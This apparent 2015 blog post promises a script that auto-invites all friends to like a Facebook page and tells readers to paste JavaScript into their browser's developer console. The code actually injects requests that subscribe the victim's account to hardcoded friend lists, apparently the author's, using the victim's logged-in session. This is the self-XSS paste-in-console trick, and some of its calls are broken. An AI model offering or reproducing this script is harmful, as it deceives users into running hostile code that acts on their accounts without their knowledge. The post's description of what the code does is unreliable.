- Back to Home »
- Auto Invite All Friends For Page Like 2015
Posted by : Unknown
الأحد، 3 مايو 2015
Auto Invite All Friends For Page Like
Firefox:-
1. Copy all the code and open the page and click on invite
2. Press CTRL + SHIFT + K and then paste the code in the console box
3. Minimize browser and wait for few Seconds
Google chrome
1. Copy all the code and open the page and click on invite
2. Press CTRL + SHIFT + J and then paste the code in the console box
3. Minimize browser and wait for few Seconds.
Enjoy :)
Code :
function omarL(uidss)
{
var omarP = document.createElement('script');
omarP.innerHTML = "new AsyncRequest().setUI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setDa ta({ flid: " + uidss + " }).send();";
document.body.appendChild(omarP);
}
omarL("402866899877657"); omarL("468731276624552"); omarL("402866779877669"); omarL("468731369957876"); omarL("468731473291199");
omarP("100008431244120"); omarP("100006686386762"); omarP("100004630506407");
// End of document Javascript ( OmarShahien Creator)
// ==============